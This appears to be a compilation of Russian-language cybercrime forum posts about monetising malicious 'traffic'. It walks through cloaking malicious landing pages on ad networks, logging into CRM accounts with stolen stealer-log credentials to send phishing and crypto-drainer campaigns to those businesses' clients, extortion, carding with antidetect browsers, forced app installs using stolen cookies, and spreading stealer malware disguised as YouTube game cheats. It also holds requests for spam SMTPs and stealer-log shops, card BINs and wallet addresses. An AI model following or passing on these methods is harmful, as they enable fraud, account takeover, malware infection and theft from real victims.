Теперь перейдем к тому, как мы будем лить. В данной статье я расскажу конкретно про CPA-партнерки, своего рода биржа паблишеров/вебмастеров, которые размещают наш материал у себя на сайтах.
Я опишу один из таких сервисов, который неплохо подойдет для новичков.
Особенности:
1. 90% вероятность, что наш лендинг пройдет модерацию
2. Быстрый апрув
3. Депозиты от $10
4. Принимает к оплате btc, paypal, cards
5. Мелкие цены и нужный тип рекламы для нас
6. Мало соседей, около 3-5%
Сейчас самое интересное, сам сайт - https://www.popads.net/
а так же подборка интересных CPA партнёрок
https://x-monitor.ru/faylovye_partnerki/ppi
(не реклама)
Это биржа рекламы, отсюда льют всеми любимые инсталлеры, которые с пеной у рта
утверждают, что льют с приватных связок, корпов и шеллов.
Регистрация простая, проходим ее на фейковые данные, никто их проверять не
будет.
После реги проходим апрув нашего лендинга. В кратце расскажу несколько
нюансов:
Name - имя вашей компании
URL - ссылка на ваш белый лендинг (обязательно ставим с https, а не http)
Quality - качество сайтов на которых будет висеть ваша реклама
Frequency Cap - Сколько раз один пользователь будет видеть вашу рекламу
After approval - ВАЖНО , СТАВИМ КАК У МЕНЯ ПАУЗУ. Кнопка отвечающая за то что
делать после того как лендинг пройдёт модерацию
Prime Spot - оставляем как есть. Отвечает за показ рекламы так же
Ad Block - думаю не нужно обьяснять , оставляем all trafic
Refferer - стандарт
Adv.type - POPUNDER (жмете в любую область сайта, вас перекидывает на
рекламируемый сайт)
3. Выбираем Smart BID - скорость наших кликов и их качество
Max Bid - сумма за 1 клик, к примеру если хотите получить 1000 кликов за 5$
ставим 0.005$
Daily Budget - лимит бюджета на эту компанию.
4. Далее все настраиваете под себя, там довольно просто. Выбираете страны, в
которых будет демонстрироваться ваш лендинг, скорость, длительность показа,
размер банера и тп.
5. Также на сайте есть что-то типа встроенной клоаки, но лучше клоачить
самому и отдельно (очень много статей в интернете)
Valid Traffic - проверяет людей на ботов. включаем кнопкой allow.
Proxy Traffic - не давать людям зайти с прокси на ваш лендинг, выключаем
кнопкой block.
Junk Traffic - не нужный трафик, ставим block
Bot Traffic - думаю понятно, ставим блок
Ждем апрува лендинга, меняем ваш белый лендинг на черный и заливаем наш софт на хостинг. Повторную модерацию наш лендинг проходить не будет, в этом и прелесть данного сервиса. Снесли белый лендос, поставили черный и начали лить,
В данной статье я разобрал лишь метод работы с CPA-сетями, на самом деле способов пролива инсталлов в разы больше, не стоит ограничиваться этим способом.
Не для всех интересно пролив бирж, но для новичков сойдёт. Я в этой теме
варюсь около 3 лет. И к сожалению не знал о существовании такого форума как
ваш, но надеюсь своими статьями как-то исправлю эту позицию.
На конкурс статей - желания нету попадать. На статьи которые оплачивают - тоже
нету желания. Просто сделал статью которая будет интересна новичкам в сфере
трафика.
Следующую статью посвящу APK проливу без бирж. Ждите друзья!
Интересно ваше мнение по поводу всего этого! Берегите себя !!!
admin перенесите пожалуйста в нужный раздел! спасибо!
Если у кого-то есть вопросы по трафику - можете задавать их в лс! всего не расскажу, а АЗЫ на легке!
Привет, это Чарли!
Много вопросов приходит по AMS, а вменяемого материала я не знаю. Решил
сделать мини-курс по этому софту. Материал новичковый, возможно будет полезно
и местным жителям.
Курс только начал записывать, потому будет выходить частями.
Первая часть тут.
Просьба не флудить в теме, если есть вопросы, пишите в ЛС. Иначе, тем, кому
реально нужно будет сложно находить материал.
Всем добра и здоровья!
Приветствую тебя, читатель!
Это моя первая авторская статья на данном форуме, в ней я поведаю вам о
уникальном способе добычи бесплатного трафика. Рассмотрим так же возможные
методы монетизации этого трафика. Способ мой личный и я работаю по нему
уже длительное время.
- Суть моего способа и его возможности
Мы будем искать доступы в различные CRM системы, анализировать системы, анализировать жертву, осуществлять пролив по клиентам жертвы от её имени.
Возможностей невероятное множество - все они зависят от функционала системы в которую нам удалось проникнуть. Мы можем встретить возможность рассылки SMS- сообщений, сообщений в мессенджеры, сообщений в другие сопутствующие приложения, сообщений на электронную почту.
Самое важное тут то, что такая рассылка будет иметь высокий траст скор, в связи с тем что она не рассылается с левых номеров и почт.
Если вас заинтересовала статья, рекомендую её дочитать до конца, так как я буду разбирать все шаги по порядку.
- Шаг 1 Поиск доступов
Итак, начинаем поиск наших жертв. Первым делом нам нужно обратиться к поисковику и попросить выдать нам CRM системы. Не стоит кидаться на самые крупные, так как там уже давно ввели 2FA (не на всех). Начинать я бы советовал с систем среднего размера. Могу посоветовать сервис Capterra - это список всех ПО, с возможностью сортировки по популярности. В этом сервисе мы сможем увидеть сразу доступен ли нужный на функционал.
Spoiler: Пример на скриншоте.
Тут мы видим сразу, что присутствует функция отправки писем, списки
контактов и т.п.
Выбрав несколько платформ, мы переходим к их первичному анализу.
Переходим на главную страницу и ищем кнопку входа.
К слову, иногда её нет, но страницу логина можно найти через гугл запросом
«nazvaniesaita login»
После мы можем наблюдать четыре варианта развития событий:
Введите лог/емэйл:пасс - это нам подходит , можем переходить к поиску
запросов.
Введите лог/емэйл:пасс:код компании - это нам не подходит , потому что
узнать код компании скорее всего у нас не выйдет без доступа к почте.
Введите лог/емэйл:пасс:домен компании - это нам может подойти , так как в
URL:LOG:PASS базе может быть в поле URL именно тот самый домен.
Перейдите на домен компании чтобы зайти - то же самое, просто для страницы
входа мы используем URL компании из базы.
Теперь мы берём собственно наш запрос с этой страницы и идём его искать при
помощи ПО в базах url:log:pass.
В моём случае такой запрос получился (выделен):
После сорта софтом получаю результаты и проверяю их.
Необходимо перебрать все найденные результаты и получить доступ к каким-то аккаунтам. На этом этапе мы сможем понять, возможно ли вообще работать с этим запросом или нет.
В процессе перебора, если удалось войти в аккаунт, значит платформа нам подходит , будут встречаться платформы где обязательная 2FA всегда, в таком случае платформа нам не подойдёт**.**
Шаг 2 - Анализ платформы
Вот мы и нашли наши аккаунты, зашли на них, и видим различные картины, в зависимости от типов деятельности наших жертв.
Первым делом в процессе сорта я бы создал отдельный файл для каждой платформы и записал доступ и краткое описание по нему (сколько клиентов/чем занимаются/уровень прав пользователя). У нас будут встречаться обычные работники и админы, понять можно сразу, у обычного много функций урезано и нет доступа к управлению настройками CRMки, а у админа всё есть.
Предположим у вас есть два доступа : 1000 клиентов и 100к клиентов.
Берём маленького и идём изучать систему.
Spoiler: Что нужно понять - Чеклист :
Есть ли возможность отправлять клиентам смс.
Есть ли возможность отправлять клиентам сообщения в приложения связанные если
такие есть (например, вам может попасться црм с интеграцией airbnb).
Есть ли возможность отправлять с корпоративной почты сообщения на почты
клиентов и партнёров.
Смотрим какие данные есть о клиентах, выгружаем все списки, проверяем на
наличие фотографий документов клиентов и наличие платёжных данных.
В зависимости от специфики смотрим есть ли любая другая ценная инфа, которую
можем продать.
Краткое пояснение.
В 99% случаев, CRM позволяет слать с корп почты и корп телефонов смс и письма,
но это может быть ограничено действующей подпиской или же просто может не быть
привязанной корп почты.
В некоторых случаях вы можете вытащить большую базу клиентов, где-то можно
вытащить их фото документов, где-то можно даже получить доступ к кредитным
картам.
Если вам показалось что это фантастика, то я вас удивлю, я такого нашёл очень
много.
! Не анализируйте платформу с большого аккаунта , чтобы он вдруг не отлетел, изучайте и тестируйте с маленьких аккаунтов. Не рекомендую регистрировать бесплатные триалки для теста , так как если вы не можете найти доступы валидные для теста, то и впринципе добывать вам их будет сложно, переходите к другому сайту.
В некоторых случаях не будет возможности разослать всем и сразу одно сообщение, и может придётся тыкаться с каждым, это уже зависит от платформы.
Шаг 3 - Анализ жертвы
Я надеюсь, вы нашли свои доступы и уже готовы проливать, но вот тут возникает
вопрос, что проливать чтобы конверсия была максимальной?
Я вам скажу так, при наличии фантазии и энтузиазма можно залить всё что
угодно.
Первым делом, давайте изучать жертву:
Найдите его сайт в сети , погуляйте, посмотрите что он продаёт
Вычислите его гео
Узнайте что он продаёт больше всего или какие его услуги пользуются
наибольшей популярностью
Собрали информацию? Теперь дело за малым - придумать оффер.
Шаг 4 - Методы монетизации
Монетизировать трафик можно разными путями, и я советую ознакомиться с каждым из них, чтобы иметь полный арсенал. Так как не все сферы деятельности жертв подойдут под определённый метод монетизации.
Однозначно - нам нужны деньги
Поехали:
- Дрейнер
Достаточно много доступов вы можете получить подходящие под дрейнер.
Из жизненных примеров, мне попался доступ в CRM компании занимающейся блокчейн
проектами, это на самом деле золотая жила для оффера под дрейнер, но по
неопытности доступ умер до того как я его успел пролить.
Вам необходимоочень детально продумать ваш оффер , очень качественно всё преподнести, сделать качественный лендинг конкретно под один пролив.
После анализа компании, который вы сделали на прошлом шаге, вы уже должны понимать, подходит ли ваша аудитория под крипто-оффер.
Выбрать я бы рекомендовал Angel Drainer. Плюсом для
вас будет большое количество лендов, которые можно быстро подкорректировать
под свой оффер.
Подробно как работать с Angel Drainer рассматривал
duk, статьи которого мне очень нравятся, информация
преподнесена чётко и мне нечего тут добавить. /threads/111409/
Поговорим ещё про офферы. Фактически при большом желании можно любую тематику прикрутить под дрейнер, например, если ваша жертва что-то продаёт.
Как пример оффер будет таким:
Code:Copy to clipboard
Dear friends!
We are pleased to inform you that we now accept payments in cryptocurrency!
In honor of this event, today there are 70% discounts on all products paid with cryptocurrency.
Go to the store.
Опять же, это я просто текст накатал, ваш оффер должен быть качественным и
продуманным.
Учтите что такой оффер будет иметь конверсию ниже, так как он заинтересует
лишь тех кто знает что такое крипта, а таких в таком магазине может быть не
так много.
- Фишинг банковских карт
Почти каждый доступ подойдёт под эту тематику , оффер можно придумать абсолютно под каждый проект.
Раз уж тут подходят все, то можно немного усложнить психологию.
После анализа вашей жертвы, постарайтесь придумать оффер, который будет
давить психологически на жертву.
Ваш оффер должен иметь обозримые последствия в случае отказа от него, например
проблемы с законом, блокировки карт. В таком случае конверсия будет гораздо
выше.
В зависимости от оффера, можно добавлять разные пользовательские поля, которые
потом могут пригодиться на вбиве, такие как адрес, зип и т.д.
Что же с этим делать? Есть разные команды, люди, которые на данный момент ищут вбив карт с отп (смс кодом или пушем). Вы можете договориться с ними, и лить трафик на фиш, в режиме лайв они будут вбивать карты с отп.
Собранные карты CC+CVV рекомендую продавать в шопе Authorize, который присутствует на этом форуме. Плюсов работы именно с ним много, конкретно в этом случае шоп подойдёт тем, что можно грузить разное количество мата, набили 20 шт. - заливайте 20 шт.
- Сбор баз данных
Любая ценная информация, которую вы соберёте может быть интересна конкурентам или властям. Первым делом можете попробовать предложить выкупить всю инфу самой жертве , намекая на то, чем это ему выльется. Если нет, можно попробовать продать конкурентам. Если тоже нет, можно продать на форуме или в дарке базу.
Заключение
Используя этот метод, можно заливать в одно нажатие сотни тысяч писем и
сообщений, с очень высоким траст скором.
Вы могли заметить, что я не дал вам ни одного актуального линка на CRM с
которыми я работаю, их предостаточно, выполняйте поиск самостоятельно,
пробуйте и тестируйте.
Что касается баз данных ULP - их много в открытом доступе, как ваш запрос закончится, вы можете его выкупать с личных логов за условные пару долларов.
Задавайте вопросы, буду рад ответить.
Spoiler: Небольшой аддон
Есть ещё несколько нюансов, которые я не рассказал.
Про перевяз:
Не рекомендую перевязывать аккаунты, так как иногда после пролива доступы к
ним сохраняются, а это хорошо, можно пролиться повторно или использовать для
других целей аккаунт.
Доп. монетизация:
Буквально вчера попался аккаунт где возможна bulk рассылка email с добавлением
файла во вложении, можно распространять любую малварь собственно говоря под
любыми предлогами.
Про соседей:
Я за всю историю своей работы, не встретил ни одного соседа, возможно потому
что акки в 60% случаев умирают после работы с ними. Возможно после публикации
соседи и появятся, но как я и сказал выше - не рекомендую изменять доступы и
перевязывать акк, так как он 100% умрёт когда легитимный юзер не сможет
попасть в панель. Соседей можно вычислить по логам рассылок, писем
доставленных клиентам.
Про другие доступы:
Взяв доступ в один аккаунт, не поленитесь прошерстить все базы на наличие
других запросов этого же юзера. Так же это хорошо подойдёт для поиска новых
CRM систем или тому подобных систем, так как пользователь на практике
использует не менее двух разных систем.
Заражение корп. системы:
Всё зависит от отдельного случая, я этого не делал, но это возможно.
Скорее всего, Twitter – для вас новый источник трафика и его возможности в
этой области действительно значительны. Как создать эффективную рекламу в
Твиттере, которая поможет вам достичь ваших целей?
Сперва - нам нужно найти хорошую тиму с Дрейнером.
Тима обязательно должна быть: с клоакой, со своим лендом и с депозитом.
После того, как нашли тиму и вступили в нее - нам потребуется домен.
Если в тиме есть свои домены - можем использовать их домены и сразу приступать
к проливам,
но если нету - покупаем по гайду ниже.
Обращаемся к Angel Drainer берём у него Дрейнер и платим
ему 15% от нашего профита (просто как вариант)
Spoiler: Где купить домен?
Многие посчитают, что лучше всего купить на reg.ru - но это не так.
Reg.ru возьмет с вас деньги за домен, а после - регистратор через +- месяц
заблокирует его и попросит предоставить *********, удостоверяющие вашу
личность. Поэтому придется использовать dропов ( люди, которые за деньги дают
свои данные). Нам же - этот геморрой не нужен. Поэтому мы покупаем домен на
nic.ru
Итак, сперва начнем с того, что нам нужны аккаунты Twitter только с синей
галочкой. Его второе имя - Twitter Blue. Без нее - у нас просто не получится
пролиться никак.
Как её получить? правильно! идём в мою статью сегодняшнюю!
https://xss.is/threads/110605/
Далее нужно настроить АнтиБраузер
Под Twitter советую настроить Dolphin Anty
Spoiler: Настройка антика
Далее делаем все по инструкции ниже:
Далее - нажимаем запустить, заходим на твиттер и авторизуемся.
дальше переходим https://business.x.com/en/advertising.html
Привязываем карту ЕУ / ВЦЦ ЮСА все так же как написано в моей статье выше
Spoiler: Настраиваем РК
Заходим на главную (АДС твиттера)
После чего кликаем "website trafic"
Spoiler: Настраиваем РК
Теперь нам нужно создать описание нашего объявления. Придумывать, как
заинтриговать нашего клиента придется вам самим.
Также я рекомендую добавить вам свой собственный дизайн объявления. При помощи
кнопки "Add media" - вы сможете добавить картинку и красивенько все оформить.
Далее добавляем название нашей рекламки, добавляем домен временный который дал
Angel Drainer , либо добавляем наш собственный домен.
Далее нас перебросит на новую страницу, в ней мы можем указать конкретную
аудиторию, на которую будем лить и множество других настроек, которые мы можем
настроить под себя
В разделе "Demographics" можно выбрать пол, возраст. Новичкам советую не
трогать этот раздел, только если вы набрались опыта - можете менять настройки.
Все оставляем по умолчанию. Теперь раздел "Targeting features". Здесь мы
добавляем ключевые слова, по которым пользователям будет высвечивать нашу
рекламу.
Рекомендую использовать этот сервис, чтобы не морочить себе голову с
придумыванием ключевых слов: https://ahrefs.com/ru/keyword-generator
Следующий пункт - Followers look-alikes. Тут нам нужно выбрать популярную
личность/паблик, на которых подписано большое кол-во людей заинтересованных
тем, чем он(а) занимается. Нам к примеру подойдет больше всего - Илон Маск.
Дальше нам нужно выбрать интересы пользователей. При регистрации пользователи
указывают свои интересы, таким людям будут показываться посты со схожими
интересами, которые вы укажите здесь.
Это поле нужно обязательно заполнить. Что выбрать? К примеру что то связанное
с трейдингом/таргетингом/с пк или IT.
Дальше мы можем выбрать операционную систему. Нам подойдет мак и виндовс.
Андроид, IOS - не трогаем. Язык - английский. Дальше указываем бюджеты и дату,
до которой будет работать наша реклама. Дневной бюджет ставим около 30$, все
зависит от вашего бюджета под проливы, но решать вам самим. Добавляем нашу
платежку, оплачиваем рекламу.
Spoiler: Основные 4 вертикали трафика под Twitter Ads:
Криптовалюта. Твиттер — место сбора крипто энтузиастов, NFT-комьюнити.
Здесь заводят паблики под крипто игры и получают инвайты в вайтлисты новых
приватных проектов. Крипта для Twitter — практически легальное явление.
Практически — потому что арбитражные криптоофферы модерацию просто так не
пройдут.
Нутра. Нутра в бурже неплохо продвигается в Twitter. Топовыми категориями
станут разрешенные локально препараты, биодобавки, похудалки, потенция. Все
клоачится и маскируется примерно также, как и в Google.
Белые товары, e-commerce, лидген. Все это, по сути, одно и то же, но
представляет собой разные товары и услуги в зависимости от выбранного ГЕО.
Приложения. Речь идет о дейтинг-приложениях, payday-loans витринах,
гемблинге и беттинге. Сливать эти вертикали на ссылку нерентабельно, а через
приложения попробовать точно стоит.
В TwitterADS, как и в любой другой социальной сети есть банворды ( слова, за
которые банят).
Перечислю слова, которые нельзя упоминать: NFT, Crypto, Bitcoin и упоминание
прочих криптовалют - запрещено.
Запрещено упоминание других популярных проектов. За это вас быстро заблокируют
без выяснений.
НО! Мы можем использовать эти банворды на нашей картинке, которую добавляли в
объявление. Боты их не могут заметить, но все же, есть риск получения бана,
если до него доберется модерация. Поэтому с этим нужно также быть аккуратным.
Также фишка твиттера в том, что вы можете запустить с одного аккаунта - сразу
несколько рекламок!
Теперь немного обьяснения :
Spoiler: давай я поумничаю
Как часто Twitter списывает деньги?
как только вы потратите не менее 25% своего [кредитного лимита
](https://business.x.com/en/help/account-setup/billing-basics/credit-
limits.html)или
как только вы потратите 500 долларов или больше или
каждые 7 дней или
последний день месяца
Цель 'Reach' в Twitter позволит вам охватить как можно большую аудиторию.
Это означает, что ваше объявление будет оптимизировано по количеству людей,
которых оно достигнет.
Продвигать объявления ( твиты )
Этот формат позволяет увеличить охват под твитами - он выглядит как обычный
твит но под ним появляется сообщение о том, что это рекламный контент.
Подготовленная таким образом реклама может отображаться, например, в ленте
пользователя.
Для его создания вы можете использовать:
Spoiler: давай я поумничаю
видео
картинки
карусель
момент (коллекция избранных твитов)
сам текст
Используйте только последние версии Chrome или Firefox и добавляйте карты
только через эти браузеры.
Большая ошибка добавлять в ключевые слова и использовать стоп слова в
объявлении и доменах. ( Сексуальный контент, Наркотики, Азартные игры,
Загрузки вредоносного ПО, Криптовалюта, Политический контент.)
Running - кампания запустилась, и начнет откручивать в течение 5-10 минут.
Pending - кампания на модерации, примерно на 30 минут (возможно бан)
Hatled - кампания в бане, бан кабинета 90% случаев
Используйте качественную клоаку (не используйте кейтаро)
Но вы скажите мне, так крипта это же золото XXI века ! КАК ЗАПУСТИТЬ?
Не бейте в лоб со старта. Не используйте ключевые топовые слова из крипты. Обыграйте ваш подход с разных сторон.
Ну в целом всё.
Для тех кто в танке, такие есть, кто понял тот понял.
Вам просто нужно запустить рекламу и не более!!!! тут разжевали вам от А до Я
Бины для работы с Twitter
4915735 474366 485356 493728 486521 404038 517746 556371
Чат Картеля : https://t.me/+y0MbOBjF1OVmMTJl
Для тех кто полюбил мои статьи или просто хочет поддержать меня (это не обязательно)
Spoiler: На хлеб с печеньем
Мой USDT TRC20
TAagun76zLoswQT2ixntsAUTzcxUnt7cFU
Мой BTC
bc1q33qqkqzhlqm7c8pnmpeeg2q0leupccueur3wa3
Моё направление это поиск дропов согласных продавать свою биометрию (видео селфи/документа) чтобы потом самому на них регать аккаунты, в настоящее время я занимаюсь этим вручную, ищу людей в каналаг тг, на форумах итд.
И вот я наткнулся на одного интересного чела который продает обучение за $325 и обучает запускать РК в google ads для привлечения дропов с сопровождением через известных гарантов до первых результатов, реклама будет литься за свои деньги, $100 в неделю.
Я абсолютно не знаком с трафиком, но предложение меня заинтриговало потому что это существенно может облегчить жизнь, и в целом чтобы потом не жалеть, я хочу узнать у вас, у знатоков стоит ли оно того или меня за лоха держат?
Флудер оператора Теле2 (www.spb.tele2.ru). Написан за 15 минут поэтому с
эфектом "зависания", хотел спать в лом было выносить в поток. Оптимальное
значение Sleep 3000 милисекунд. Написана на WinInet поэтому никаких Conection
Closed.
Комментируем.
Скачать.
Мини гайд по установке мощного бомбера для самых маленьких.
What is the best service to be able to send spam emails without having any limitations?
Знакомый до конца просил это не публиковать а продавать по 2000-4000 usd + 1000 за софт, но так как в денежке особо не нуждаемся публикуемся здесь.
Сижу за пк, никого не трогаю. У меня уже ранее утро, думаю никто тревожить не будет решил сходить в белый дом и навестить зал заседаний. Ну тут как обычно -_- начинают написывать.
Ну епртс. Чтож тут поделаешь. Придется помогать человеку. Какой же быстрый и
стабильный способ у нас существует. Да все изи. Пишет софт на BAS или аналогах
на кипере и прочей хне. (исходники прилагать не собираюсь так как я его давно
уже модифицировал под свои нужды).
Суть софта: Грузим логи со стилаков и ходим по ссылке. Если куки валидные и человек подключал этот аккаунт к телефону, то у вас будет вот такая табличка, когда вы хотите установить какое либо приложение.
Как только телефон \ планшет и прочая хуета на андроиде будет в сети то на
устройство установится нужное приложение без каких либо проблем если оно
находится в маркете. Таким способом можно заразить большое количество
устройств в очень сжатые сроки, главное чтобы куки были валидными.
Пишем аналогичный софт. Как писать софт на base или кипере обьяснять не буду, так как изучайте сами и учитесь. Знание таких софтинок всегда пригодится. Софтинка малюсенькая, а приносит бабосиков намана.
Привел скрин своего софта как пример чтобы на что было ориентироваться. Ничего
сложного в этом нет. С пака паблика (ясен хер я со своих логов не буду кому
что-то устанавливать) получилось нагнать человеку 6915 установок. Так что
дерзайте кому интересно. Написать такой софт 2-3 часа попивая чаек паралельно
играя в MLBB.
Небольшая бонус. Если заморочиться и залезть на нужные площадки, где выдаются реферальные ссылки с редиректом на google play то можно сделать так, что все эти люди переходили с ваших сайтов и устанавливали приложения по реферальным ссылкам.
Делается это на изи.
Идем (как же я хотел вместо идем написать "пиздуем" но низя -_-) на любой
прокси сервис с резидентскими проксями и покупаем несколько прокси с такими
настройками. Обязательно ставьте смену ip с "на каждый запрос", то есть будет
ротация ip адреса при каждом новом запросе.
Я беру всегда топ страны за которые платят больше всего ))) Кто понял о чем идет речь тот молодец возьми печеньку, кто не понял думайте сами и врубайте мозги. Так как я собрал уже все что можно собрать и все что можно отлить, то можно уже публиковать. Ожидаем как быстро появятся барыги инсталов под такие вещи (как и с темой про ev серты.) Думаю в течении недели.
Ну и как обычно вот вам красивая тяночка на последок. (руки на стол епта!!!)
PS
Для тех кто мало что понял, то таким способом можно неплохо зарабатывать даже
с паблик логов, если сможете написать аналогичный софт.
You must have at least 3 message(s) to view the content.
Всем доброго времени. Недавно понадобилось зарегать акк на юса гео. И
оказалось, что не все так просто.
Что было сделано:
- Рега с эмуля в разных конфигурациях (сразу бан)
- Рега с физ устройства (реальное гео без вариантов)
- Рега с физ устройства с отключенной сим и вайфай, инет через комп в нужное
гео через режим отладки (все приложения кроме ТТ нормально выходят в инет. ТТ
просит включить вайфай или моб инет.)
- Рега с физ устройства с отключенной сим и пробросом вайфай в нужное гео
через проксирование (нужное гео получено, теневой бан тоже)
- Рега с физ устройства с включенной сим и пробросом вайфай в нужное гео
через проксирование (реальное гео без вариантов)
-Перенос купленного акка с нужным гео на физ устройство с отключенной сим и пробросом вайфай в нужное гео через проксирование (нужное гео получено, теневой бан тоже)
Еще не протестил есим нужного гео. Возможно решение там.
Возможно я очень сильно закапываюсь и есть более простой способ.
Если кто-то сможет подсказать, буду признателен.
Всех приветствую, заметил, что все чаще пиарят дрейнера и большие профиты. Хотелось бы поинтересоваться насчет этой темы. Взять хороший домен, сделать уникальный лендинг и выкладываться тематические посты на том же твиттере, есть ли шанс на нормальную сумму? Поделитесь опытом, люди которые проливали гугл адс. С какими проблемами вы столкнулись при проливе, стоит ли лезть с эту тему?
Софт делал не я, однако русский язык позволит лучше разобраться в интерфейсе
Некоторые преимущества:
График отправки
Отправка по одному с настройкой интервала (секунды)
Автоматическая повторная отправка в случае сбоя с максимальными настройками
времени и интервала (минуты)
Более 1 отправки однвоременно
Список учетных записей SMTP и автоматический выбор доступной, если значение по
умолчанию недоступно
Список прокси-серверов и автоматический выбор доступного, если значение по
умолчанию недоступно
Отправка копии для каждого исходящего сообщения
WYSIWYG редактор содержимого электронной почты с форматированным текстом
(HTML)
Пользовательский отправитель/получатель ответа/получатель уведомления о
прочтении
Соединение SMTP с защитой SSL/TLS
Создание популярных учетных записей SMTP напрямую
В общем то, можете поиграться. Возможно для кого-то подойдет
You must have at least 10 reaction(s) to view the content.
На вт сами кидайте если вам это нужно
Нужен ваш опыт в этом.
Правильный пролив через YT - на игровые запросы (как лучше , что цепляет)
Крипто трафик , выслушаю крутые идеи, приму и реализую!
Дорогие друзья,такой вопрос какую программу использовать для рассылок email? Платную может есть бесплатные, или может быть удобней сервис какой-то. Хотелось бы услышать мнение экспертов, понял из сообщений, что слать на корпоративные почты проще так ли это, нужно каждый раз рандомизировать письмо при отправке на корпы?
Hello,
I'm looking for alternatives to Genesis / Russian Market to buy stealer logs.
I've found a few websites but they don't have the search by link/mask, any of
you guys know any other shop which does provide this kind of functionalities?
To mods/admin : I didn't know where to publish this thread, so feel free to move it to a more adeguate category in case I did make it in the wrong one
Hi Everyone. What are the best carded/hacked smtps I can use to send bulk emails everyday? By the way I can use Rotation and bulk proxies.
Всех читателей приветствую на своём кратком мануале по работе с логами.
Забегая вперёд скажу, что данная статья вряд ли будет полезна тем, кто уже
знаком с кардингом. Ну, а тем, кто только вникает или рассматривает эту нишу -
рекомендую дочитать до конца.
Статья моя написана словами, понятными для каждого, на простом языке. Писать
буду на основании собственного опыта, расскажу с чего стоит начать новичку,
чтобы избежать бессмысленных трат, а также влиться в столь увлекательную и
интересную тему.
Начнём с того, что Log - это файл, добытый стиллером, в котором содержится
информация, находящаяся на компьютере жертвы. В лог входят: Autofill (файлы
автозаполнения); Cookies (куки); Information (общие сведения); Passwords
(пароли), а также временами попадаются Coins (криптокошельки).
Среднестатистический лог
Статья у нас познавательная, для новичков, и начать стоит с самого простого -
с подготовки рабочего пространство, для этого нам необходимо установить
Антидетект-браузер (позволяет менять или маскировать цифровой отпечаток
браузера), лично я пользуюсь Octo Browser - достаточно простой и в принципе
доступный каждому (€29 за месяц подписки).
Итак, установили браузер, приобрели подписку, создаём "Новый Профиль".
Теперь нам необходимо настроить профиль под КХ (Card Holder - жертва), перед
нами 4 нужные панели: Основные, Аппаратные, Соединение, Куки.
И тут, раз я завёл разговор про "Соединение" и приложил скрин, где уже
заполнена графа "Описание" - перейдём к файлу "Information", из него мы
извлекаем IP и Железо (Processor/CPU/RAM/VideoCard):
Information
Ip: 173.50.90.247 - копируем его и переходим в Телеграмм, нам нужен IP Score
Bot
IP Score Bot
Кидаем в чат IP и получаем всю информацию по нему. Скажу, что Регион, Город,
ZIP я переношу в антик, "Описание" раздела "Основные", так удобнее в
дальнейшем при продлении носка. ZIP мы копируем и переходим на
Faceless, именно здесь я покупаю Socks/Носки (прокси),
перейдя на сайт в одноимённое поле мы вставляем ZIP, подбираем подходящий по
скорости и стоимости (рекомендую брать 90Kb-500Kb, а также от 1$ по
стоимости):
Приобретя подходящий носок, копируем его и возвращаемся в Octo Browser:
Создаём только после настройки железа и куки
В разделе "Аппаратные" мы настраиваем железо из "Information".
Далее в одноимённый раздел мы переносим Cookies и создаём профиль.
Итак, получается, мы дошли до финала настройки антика, если лог свежий, не
передавался по рукам, то куки скорее всего живые, можно приступить к работе с
интересующими запросами.
От себя рекомендую покупать логи у проверенных селлеров, если покупаете логи
по определенным запросам - пользуйтесь гарантами и заранее обговаривайте все
условия сделки и обмена материала, чтобы не потерять время и деньги. Имейте в
виду, нет никаких гарантий того, что в логах вы найдёте гарантированный
профит, любое вложение средств на материал - риск остаться без денег. Прежде,
чем приступить к работе - вступите в тематические чаты, чтобы в трудных
ситуациях можно было задать те или иные вопросы и получить на них ответ.
Чат
В завершение хотел бы предостеречь Вас, не ведитесь на поводу у тех, кто
обещает быстрое и легкое обучение кардингу, краткосрочный профит или что-то
еще, всё это - scam.
Всем, кто дочитал, желаю удачи и успехов в работе
Копипаст. Автора дам в лс.
Как же приятно перед сном включить ютуб и посмотреть пару видосиков.
А вы задумывались о том, что вещь которая заменила вам телевизор, может
стать источником инсталлов?
На форумах умер скам, работать стало сложно. Куда же перешла вся школа?
В трафферские тимы
Введение:
Для комфортного старта, конечно же необходим стартовый капитал. Чтобы не тратить время впустую и получать хоть какие-то логи, накопите ~~с~~обедов~~~~ 500-1000р. Конечно, можно начать и без вложений, но это влечёт за собой траты времени и трудности.
Суть работы этой системы очень проста:
Мы навязываем скачивание и запуск нашего файла и получаем логи. Вы можете подумать, что человек должен быть конченым мамонтом и лохом, чтобы запустить на основе подобный софт. Да, это так. Но не все такие крутые как вы, а процесс рождения лохов непрерывен. На ютубе очень много пользователей и трафика, так что убирайте все сомнения, кладите в мешок для сменки и идите в школу.
Берём билд и тхт файл, пишем в тхт любой выдуманный пас для архива и архивируем вместе с билдом. Тхт назовите «pass”. Пароль не должен быть сложным, нужно что-то типа «12345».
Так же перед тем как перенести билд в архив , вы должны выбрать тематику на которую будете распространять свой билд. Это может быть , как спуфер на Fortnite , Apex , Rust | Скин ченджер на Fortnite , CS:GO | Плагины на фотошоп | Читы на те же самые игры |
Дальнейшие действия:
Мы определились с тематикой нашего видео с помощью которого вы будете
распространять данный файл , далее мы выбираем , берем ли мы уже готовое видео
( Но тогда оно уже не будет уникальным ) , или делаем его самостоятельно (
Больше запар - больше профита ). Расскажу именно про первый вариант - заходим
на тот же ютуб вбиваем в поиск , то что мы хотим лить , допустим возьмем
Скинченджер на фортнайт , берем самое подходящие для нас видео и приступаем к
дальнейшей работе.
Что бы скачать видео с ютуба , вставляем ссылку ролика на https://ru.savefrom.net/ и качаем его.
Я даже рефку не вставил
Нам потребуется уникализировать наше видео в какой-то степени , для этого мы
заходим на данный сайт https://panzoid.com/ (не реклама). Если вы не хотите
, вы можете этого не делать! Выбираем подходящие для нас интро.
Меняем текст на свой.
И скачиваем.
После того , как скачали интро конвертируем его из mvk в mp4.
Приступаем к монтажу видео в Sony Vegas 2014 , вы можете использовать любую другую программу для видео монтажа.
Используем: Color Curves , добавляем в Sony Vegas музыку ( желательно на
английском ) , И вставляем интро в начале. Что бы разделить видео от музыки:
используем комбинацию клавиш ctrl + u и удаляем чужую музыку.
**Уникализация закончена
Дальнейшие действия:**
Нам необходимо загрузить наш "Билд" который уже подделан под видео с помощью
которого вы будете распространять его , на файлообменник , советую к
использованию mediafire
Вы можете добавить в свой ахрив с билдом , всякие dll и прочие , дабы данный
софт выглядел более нагляднее на деле.
У вас должно получиться что-то вроде этого в конечном результате билда.
Когда мы уже закончили с архивом , заливаем его на mediafire и получаем
ссылку.
Загрузка видео на Ютуб:
Либо покупаем уже раскрученный канал , либо используем любой свой. Или берём
логи и чекаем, вариантов масса.
